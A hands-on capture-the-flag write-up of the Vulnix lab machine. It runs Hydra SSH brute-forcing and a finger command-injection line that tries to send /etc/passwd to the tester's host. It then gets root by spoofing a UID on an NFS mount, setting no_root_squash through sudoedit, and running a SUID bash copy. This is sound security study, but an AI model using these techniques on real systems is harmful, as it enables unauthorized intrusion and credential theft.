Vulnix 1
The description for this one says the issues are with software configuration rather than specifically vulnerable versions of software! So, I'll try to do this one without abusing the old versions of software bundled in, it was released 8 years ago after all... I think I need to move onto newer stuff soon.
Nmap scan report for 192.168.173.130
Host is up (0.0016s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
79/tcp open finger
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
512/tcp open exec
513/tcp open login
514/tcp open shell
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
MAC Address: 00:0C:29:61:FF:DC (VMware)
Wow that's a lot of services! We have a big hint for this one - we're expecting misconfigured services. Let's start with SSH:
$ ssh -v root@192.168.173.130
...
debug1: Authentications that can continue: publickey,password
Allowing SSH at root is certainly a misconfiguration! But really all we can do with it, for now, is to try to brute-force root access.
└─$ hydra -l root -P /usr/share/wordlists/metasploit/password.lst ssh://192.168.173.130 255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 10:08:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 88397 login tries (l:1/p:88397), ~5525 tries per task
[DATA] attacking ssh://192.168.173.130:22/
I highly doubt this will get us in, but I'll let it run regardless! I also started a SMTP user enumeration module on metasploit, which got me some results:
msf6 auxiliary(scanner/smtp/smtp_enum) > run
[*] 192.168.173.130:25 - 192.168.173.130:25 Banner: 220 vulnix ESMTP Postfix (Ubuntu)
[+] 192.168.173.130:25 - 192.168.173.130:25 Users found: , backup, bin, daemon, games, gnats, irc, landscape, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, syslog, user, uucp, whoopsie, www-data
[*] 192.168.173.130:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So, I started a short bruteforce on user user
and whoopsie
too because that just seemed too default:
└─$ hydra -l user -p /usr/share/wordlists/metasploit/http_default_pass.txt ssh://192.168.173.130 255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 10:25:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.173.130:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 10:25:35
└─$ hydra -l whoopsie -p /usr/share/wordlists/metasploit/http_default_pass.txt ssh://192.168.173.130 255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 10:25:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.173.130:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 10:25:35
Now I want to turn my attention to all those non-standard services, let's poke at them with a TCP connection:
─$ nc 192.168.173.130 512
Where are you?
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.173.130 513
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.173.130 513 id
invalid port id
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.173.130 514
getnameinfo: Temporary failure in name resolution
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 192.168.173.130 79 255 ⨯
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
No one logged on.
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
user
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
root
Login: root Name: root
Directory: /root Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Interesting! This is letting us run finger
binary... This is basically like getting an SUID binary?
Taking a look at gtfobins, finger is there!
- https://gtfobins.github.io/gtfobins/finger/ We may be able to gain Upload/Download of files! Let's try to download a file...
# Start a local listener to wait for the file
$ sudo nc -l -p 79 | base64 -d > "local_file"
# Use finger over nc to download a file
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
"$(base64 /etc/passwd)@192.168.173.129"
fingerd: forwarding not allowed
# Try an upload
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
kali@192.168.173.129 | base64 -d > "test"
fingerd: forwarding not allowed
Looks like this method is blocked? I'm going to move on for a while... Turning my attention to nfs & rpcbind:
msf6 > use auxiliary/scanner/nfs/nfsmount
msf6 auxiliary(scanner/nfs/nfsmount) > info
Name: NFS Mount Scanner
Module: auxiliary/scanner/nfs/nfsmount
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTOCOL udp yes The protocol to use (Accepted: udp, tcp)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 111 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module scans NFS mounts and their permissions.
References:
https://cvedetails.com/cve/CVE-1999-0170/
http://www.ietf.org/rfc/rfc1094.txt
msf6 auxiliary(scanner/nfs/nfsmount) > set RHOSTS 192.168.173.130
RHOSTS => 192.168.173.130
msf6 auxiliary(scanner/nfs/nfsmount) > set RPORT 2049
RPORT => 2049
msf6 auxiliary(scanner/nfs/nfsmount) > run
[*] 192.168.173.130:2049 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/nfs/nfsmount) > set RPORT 111
RPORT => 111
msf6 auxiliary(scanner/nfs/nfsmount) > run
[+] 192.168.173.130:111 - 192.168.173.130 NFS Export: /home/vulnix [*]
[*] 192.168.173.130:111 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
While learning how to mount this, I stumbled accross a potential root vector:
- https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe I'll come back to this if we get a shell! Anyway, I mounted the remote NFS drive:
$ sudo mount 192.168.173.130:/home/vulnix /home/kali/Desktop/tmp/test
$ ls -al ./test
ls: cannot open directory 'test': Permission denied
$ ls -al
total 12
drwxr-xr-x 3 kali kali 4096 Jan 10 16:14 .
drwxr-xr-x 3 kali kali 4096 Jan 10 16:13 ..
drwxr-x--- 2 nobody 4294967294 4096 Sep 2 2012 test
I don't think I can get any further here, but this will be a valuable privledge escalation vector later on. Back to try to get a shell on the system... I did some more research, the services on port 513 and 514 are Rlogin and Rexec. Here's me testing login without a password via RExec:
$ └─# rsh -l root 192.168.173.130
The authenticity of host '192.168.173.130 (192.168.173.130)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.173.130' (ECDSA) to the list of known hosts.
root@192.168.173.130's password:
Permission denied, please try again.
root@192.168.173.130's password:
Permission denied, please try again.
root@192.168.173.130's password:
root@192.168.173.130: Permission denied (publickey,password).
┌──(root💀kali)-[/mnt]
└─# rsh -l vulnix 192.168.173.130 255 ⨯
vulnix@192.168.173.130's password:
Permission denied, please try again.
vulnix@192.168.173.130's password:
Permission denied, please try again.
vulnix@192.168.173.130's password:
vulnix@192.168.173.130: Permission denied (publickey,password).
And RLogin
└─$ rlogin -l root -p 513 192.168.173.130
kex_exchange_identification: read: Connection reset by peer
Connection reset by 192.168.173.130 port 513
I've been poking around for hours and I really can't find anything overly useful, so I'm going to circle back to the basics for a while... Using Finger, let's confirm my old enumerated userlist:
# Test `user`
└─# nc 192.168.173.130 79 127 ⨯
user
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.
└─# nc 192.168.173.130 79
whoopsie
Login: whoopsie Name:
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
Okay so it seems the only account created was user
, let's try a broader brute-force...
$ hydra -v -l user -P /usr/share/wordlists/metasploit/common_roots.txt ssh://192.168.173.130 -t 4
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 17:56:48
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4725 login tries (l:1/p:4725), ~1182 tries per task
[DATA] attacking ssh://192.168.173.130:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://user@192.168.173.130:22
[INFO] Successful, password authentication is supported by ssh://192.168.173.130:22
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 4681 to do in 01:47h, 4 active
My thought here is it can easily be considered a misconfiguration to allow password auth over ssh, so it's worth focusing on some more? I went to get some food.
[STATUS] 33.67 tries/min, 101 tries in 00:03h, 4624 to do in 02:18h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 4521 to do in 02:36h, 4 active
[STATUS] 29.40 tries/min, 441 tries in 00:15h, 4284 to do in 02:26h, 4 active
[STATUS] 28.52 tries/min, 884 tries in 00:31h, 3841 to do in 02:15h, 4 active
[STATUS] 28.60 tries/min, 1344 tries in 00:47h, 3381 to do in 01:59h, 4 active
[STATUS] 28.20 tries/min, 1784 tries in 01:03h, 2941 to do in 01:45h, 4 active
[STATUS] 28.31 tries/min, 2244 tries in 01:19h, 2481 to do in 01:28h, 4 active
[STATUS] 28.38 tries/min, 2704 tries in 01:35h, 2021 to do in 01:12h, 4 active
[22][ssh] host: 192.168.173.130 login: user password: letmein
[STATUS] attack finished for 192.168.173.130 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 19:41:00
WOHOO!! Now that we have a shell, I want to check my anticipated root vector:
user@vulnix:/$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
Ah nope, looks like this isn't going to help us. Onwards with the usual poking...
user@vulnix:/$ find / -perm -4000 2>/dev/null
/sbin/mount.nfs
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/procmail
/bin/ping6
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
user@vulnix:/$ ps aux | grep root
root 1 0.0 0.3 3516 1908 ? Ss 09:32 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 09:32 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 09:32 0:00 [ksoftirqd/0]
root 6 0.0 0.0 0 0 ? S 09:32 0:00 [migration/0]
root 7 0.0 0.0 0 0 ? S 09:32 0:00 [watchdog/0]
root 8 0.0 0.0 0 0 ? S< 09:32 0:00 [cpuset]
root 9 0.0 0.0 0 0 ? S< 09:32 0:00 [khelper]
root 10 0.0 0.0 0 0 ? S 09:32 0:00 [kdevtmpfs]
root 11 0.0 0.0 0 0 ? S< 09:32 0:00 [netns]
root 12 0.0 0.0 0 0 ? S 09:32 0:00 [sync_supers]
root 13 0.0 0.0 0 0 ? S 09:32 0:00 [bdi-default]
root 14 0.0 0.0 0 0 ? S< 09:32 0:00 [kintegrityd]
root 15 0.0 0.0 0 0 ? S< 09:32 0:00 [kblockd]
root 16 0.0 0.0 0 0 ? S< 09:32 0:00 [ata_sff]
root 17 0.0 0.0 0 0 ? S 09:32 0:00 [khubd]
root 18 0.0 0.0 0 0 ? S< 09:32 0:00 [md]
root 21 0.0 0.0 0 0 ? S 09:32 0:00 [khungtaskd]
root 22 0.0 0.0 0 0 ? S 09:32 0:00 [kswapd0]
root 23 0.0 0.0 0 0 ? SN 09:32 0:00 [ksmd]
root 24 0.0 0.0 0 0 ? S 09:32 0:00 [fsnotify_mark]
root 25 0.0 0.0 0 0 ? S 09:32 0:00 [ecryptfs-kthrea]
root 26 0.0 0.0 0 0 ? S< 09:32 0:00 [crypto]
root 34 0.0 0.0 0 0 ? S< 09:32 0:00 [kthrotld]
root 37 0.0 0.0 0 0 ? S 09:32 0:00 [scsi_eh_0]
root 38 0.0 0.0 0 0 ? S 09:32 0:00 [scsi_eh_1]
root 39 0.0 0.0 0 0 ? S 09:32 0:00 [kworker/u:3]
root 60 0.0 0.0 0 0 ? S< 09:32 0:00 [devfreq_wq]
root 183 0.0 0.0 0 0 ? S< 09:32 0:00 [mpt_poll_0]
root 186 0.0 0.0 0 0 ? S< 09:32 0:00 [mpt/0]
root 191 0.0 0.0 0 0 ? S 09:32 0:00 [scsi_eh_2]
root 204 0.0 0.0 0 0 ? S< 09:32 0:00 [kdmflush]
root 212 0.0 0.0 0 0 ? S< 09:32 0:00 [kdmflush]
root 226 0.0 0.0 0 0 ? S 09:32 0:00 [jbd2/dm-0-8]
root 227 0.0 0.0 0 0 ? S< 09:32 0:00 [ext4-dio-unwrit]
root 420 0.0 0.1 2816 612 ? S 09:32 0:00 upstart-udev-bridge --daemon
root 422 0.0 0.2 3096 1212 ? Ss 09:32 0:00 /sbin/udevd --daemon
root 515 0.0 0.0 0 0 ? S< 09:32 0:00 [kpsmoused]
root 621 0.0 0.1 3092 816 ? S 09:32 0:00 /sbin/udevd --daemon
root 638 0.0 0.1 3092 816 ? S 09:32 0:00 /sbin/udevd --daemon
root 706 0.0 0.1 2680 996 ? Ss 09:32 0:00 rpcbind -w
root 760 0.0 0.0 0 0 ? S< 09:32 0:00 [rpciod]
root 791 0.0 0.0 0 0 ? S< 09:32 0:00 [nfsiod]
root 799 0.0 0.1 2892 772 ? Ss 09:32 0:00 rpc.idmapd
root 812 0.0 0.1 2828 600 ? S 09:32 0:00 upstart-socket-bridge --daemon
root 851 0.0 0.1 2908 812 ? Ss 09:32 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root 874 0.0 0.4 6664 2412 ? Ss 09:32 0:06 /usr/sbin/sshd -D
root 957 0.0 0.1 4612 832 tty4 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty4
root 961 0.0 0.1 4612 840 tty5 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty5
root 969 0.0 0.1 4612 836 tty2 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty2
root 971 0.0 0.1 4612 836 tty3 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty3
root 978 0.0 0.1 4612 832 tty6 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty6
root 994 0.0 0.1 2412 716 ? S 09:32 0:00 /usr/sbin/inetutils-inetd
root 997 0.0 0.2 2992 1140 ? Ss 09:32 0:00 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf
root 1002 0.0 0.1 2156 604 ? Ss 09:32 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root 1003 0.0 0.1 2600 764 ? Ss 09:32 0:00 cron
root 1032 0.0 0.1 2700 928 ? S 09:32 0:00 dovecot/log
root 1034 0.0 0.6 5088 3068 ? S 09:32 0:00 dovecot/config
root 1055 0.0 0.0 0 0 ? S 09:32 0:00 [lockd]
root 1056 0.0 0.0 0 0 ? S< 09:32 0:00 [nfsd4]
root 1057 0.0 0.0 0 0 ? S< 09:32 0:00 [nfsd4_callbacks]
root 1058 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1059 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1060 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1061 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1062 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1063 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1064 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1065 0.0 0.0 0 0 ? S 09:32 0:00 [nfsd]
root 1069 0.0 0.3 3568 1760 ? Ss 09:32 0:00 /usr/sbin/rpc.mountd --manage-gids
root 1173 0.0 0.2 4560 1468 ? Ss 09:32 0:00 /usr/lib/postfix/master
root 1215 0.0 0.1 4612 848 tty1 Ss+ 09:32 0:00 /sbin/getty -8 38400 tty1
root 1218 0.0 0.0 0 0 ? S 09:32 0:00 [flush-252:0]
root 8781 0.0 0.0 0 0 ? S 13:22 0:00 [kworker/u:1]
root 10353 0.0 0.0 0 0 ? S 15:51 0:01 [kworker/0:2]
root 10468 0.0 0.6 9632 3052 ? Ss 16:00 0:00 sshd: user [priv]
root 11172 0.0 0.0 0 0 ? S 16:33 0:00 [kworker/0:1]
root 11368 0.0 0.0 0 0 ? S 17:03 0:00 [kworker/0:0]
user 11370 0.0 0.1 4372 828 pts/0 S+ 17:05 0:00 grep --color=auto root
user@vulnix:/$ cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details
# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes
# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768
# Logging
SyslogFacility AUTH
LogLevel INFO
# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile %h/.ssh/authorized_keys
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no
#MaxStartups 10:30:60
#Banner /etc/issue.net
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
user@vulnix:/etc$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
Dovecot if misconfigured can apparently result in RCE, and it's running as root... so let's try?
user@vulnix:~$ ps aux | grep dovecot
root 997 0.0 0.2 2992 1140 ? Ss 09:32 0:00 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf
dovecot 1031 0.0 0.1 2704 832 ? S 09:32 0:00 dovecot/anvil
root 1032 0.0 0.1 2700 928 ? S 09:32 0:00 dovecot/log
root 1034 0.0 0.6 5088 3068 ? S 09:32 0:00 dovecot/config
user 13079 0.0 0.1 4368 832 pts/0 S+ 20:47 0:00 grep --color=auto dovecot
user@vulnix:~$ cat /etc/dovecot/dovecot.conf
## Dovecot configuration file
# If you're in a hurry, see http://wiki2.dovecot.org/QuickConfiguration
# "doveconf -n" command gives a clean output of the changed settings. Use it
# instead of copy&pasting files when posting to the Dovecot mailing list.
# '#' character and everything after it is treated as comments. Extra spaces
# and tabs are ignored. If you want to use either of these explicitly, put the
# value inside quotes, eg.: key = "# char and trailing whitespace "
# Default values are shown for each setting, it's not required to uncomment
# those. These are exceptions to this though: No sections (e.g. namespace {})
# or plugin settings are added by default, they're listed only as examples.
# Paths are also just examples with the real defaults being based on configure
# options. The paths listed here are for configure --prefix=/usr
# --sysconfdir=/etc --localstatedir=/var
# Enable installed protocols
!include_try /usr/share/dovecot/protocols.d/*.protocol
# A comma separated list of IPs or hosts where to listen in for connections.
# "*" listens in all IPv4 interfaces, "::" listens in all IPv6 interfaces.
# If you want to specify non-default ports or anything more complex,
# edit conf.d/master.conf.
#listen = *, ::
# Base directory where to store runtime data.
#base_dir = /var/run/dovecot/
# Name of this instance. Used to prefix all Dovecot processes in ps output.
#instance_name = dovecot
# Greeting message for clients.
#login_greeting = Dovecot ready.
# Space separated list of trusted network ranges. Connections from these
# IPs are allowed to override their IP addresses and ports (for logging and
# for authentication checks). disable_plaintext_auth is also ignored for
# these networks. Typically you'd specify your IMAP proxy servers here.
#login_trusted_networks =
# Sepace separated list of login access check sockets (e.g. tcpwrap)
#login_access_sockets =
# Show more verbose process titles (in ps). Currently shows user name and
# IP address. Useful for seeing who are actually using the IMAP processes
# (eg. shared mailboxes or if same uid is used for multiple accounts).
#verbose_proctitle = no
# Should all processes be killed when Dovecot master process shuts down.
# Setting this to "no" means that Dovecot can be upgraded without
# forcing existing client connections to close (although that could also be
# a problem if the upgrade is e.g. because of a security fix).
#shutdown_clients = yes
# If non-zero, run mail commands via this many connections to doveadm server,
# instead of running them directly in the same process.
#doveadm_worker_count = 0
# UNIX socket or host:port used for connecting to doveadm server
#doveadm_socket_path = doveadm-server
# Space separated list of environment variables that are preserved on Dovecot
# startup and passed down to all of its child processes. You can also give
# key=value pairs to always set specific settings.
#import_environment = TZ
##
## Dictionary server settings
##
# Dictionary can be used to store key=value lists. This is used by several
# plugins. The dictionary can be accessed either directly or though a
# dictionary server. The following dict block maps dictionary names to URIs
# when the server is used. These can then be referenced using URIs in format
# "proxy::<name>".
dict {
#quota = mysql:/etc/dovecot/dovecot-dict-sql.conf.ext
#expire = sqlite:/etc/dovecot/dovecot-dict-sql.conf.ext
}
# Most of the actual configuration gets included below. The filenames are
# first sorted by their ASCII value and parsed in that order. The 00-prefixes
# in filenames are intended to make it easier to understand the ordering.
!include conf.d/*.conf
# A config file can also tried to be included without giving an error if
# it's not found:
!include_try local.conf
user@vulnix:~$ ls /etc/dovecot/conf.d
10-auth.conf 10-logging.conf 10-master.conf 15-lda.conf 20-pop3.conf 90-plugin.conf auth-deny.conf.ext auth-passwdfile.conf.ext auth-system.conf.ext
10-director.conf 10-mail.conf 10-ssl.conf 20-imap.conf 90-acl.conf 90-quota.conf auth-master.conf.ext auth-static.conf.ext auth-vpopmail.conf.ext
user@vulnix:~$ grep use_shell -- $(exim -bP configure_file)
The program 'exim' can be found in the following packages:
* exim4-daemon-heavy
* exim4-daemon-light
Ask your administrator to install one of them
Another deadend, no exim. I'm truly stumped here. I think what I'll do, is stop trying to get root and try to get onto the other user, vulnix
and see what we can do from there....
Moving back onto the NFS mount, we know vulnix's user ID now so we should be able to abuse that to mount it and get access to the vulnix user. Let's do that.
# On Remote
$ cat /etc/passwd
...
vulnix:x:2008:2008::/home/vulnix:/bin/bash
...
# Edit /etc/passwd on local machine to change vulnix user ID to be 2008
$ vim /etc/passed
...
# Try to access the mounted NFS drive again
┌──(root💀kali)-[/mnt]
└─# ls
vulnix
┌──(root💀kali)-[/mnt]
└─# cd vulnix
cd: permission denied: vulnix
┌──(root💀kali)-[/mnt]
└─# ls 1 ⨯
vulnix
┌──(root💀kali)-[/mnt]
└─# ls -al
total 48
drwxr-xr-x 3 root root 4096 Jan 10 19:41 .
drwxr-xr-x 19 root root 36864 Nov 17 09:13 ..
drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 vulnix
┌──(root💀kali)-[/mnt]
└─# su vulnix
┌──(vulnix㉿kali)-[/mnt]
└─$ cd vulnix/
┌──(vulnix㉿kali)-[/mnt/vulnix]
└─$ ls
┌──(vulnix㉿kali)-[/mnt/vulnix]
└─$ ls -al
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 .
drwxr-xr-x 3 root root 4096 Jan 10 19:41 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
...
Wohoo! Okay, now let's get ssh access to this user.
$ mkdir .ssh & cd .ssh
$ echo ~/.ssh/id_rsa.pub > authorized_keys
$ ssh vulnix@192.168.173.130
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
Sweet, now what can we do...
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
Oh shit that was fast, we can edit exports to give ourselves no-root-squash and we win!
I used sudoedit to change root_squash -> no_root_squash, but how do I get the machine to update the config... I could cheat and reboot the machine but that's unrealistic.
Here it says we just need to run exportfs
but we don't have permissions to do so.
I tried to find a vector to reboot (without just getting root with old software or a kernel exploit) for a longggg time. I couldn't come up with anything.
So - my reasoning for this cheat here is that eventually every real server will reboot. So in the real world we would just wait for that moment. I rebooted the damn thing...
# On host
┌──(root💀kali)-[/mnt]
└─$ sudo mount -t nfs 192.168.173.130:/home/vulnix /mnt/vulnix -o nolock
┌──(root💀kali)-[/mnt]
└─$ cd vulnix
# On target
$ cp /bin/bash ~/.x
# On host
$ cp /mnt/vulnix/x /mnt/vulnix/y
$ chmod 4777 /mnt/vulnix/y
# On target
vulnix@vulnix:~$ ./y -p
y-4.2# id
uid=2008(vulnix) gid=2008(vulnix) euid=0(root) groups=0(root),2008(vulnix)
y-4.2# cd /root
y-4.2# ls
trophy.txt
y-4.2# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
Finally, we Win! This one took a long time, but I learned a lot and enjoyed the restriction of not being able to just use an exploit chain with metasploit or something.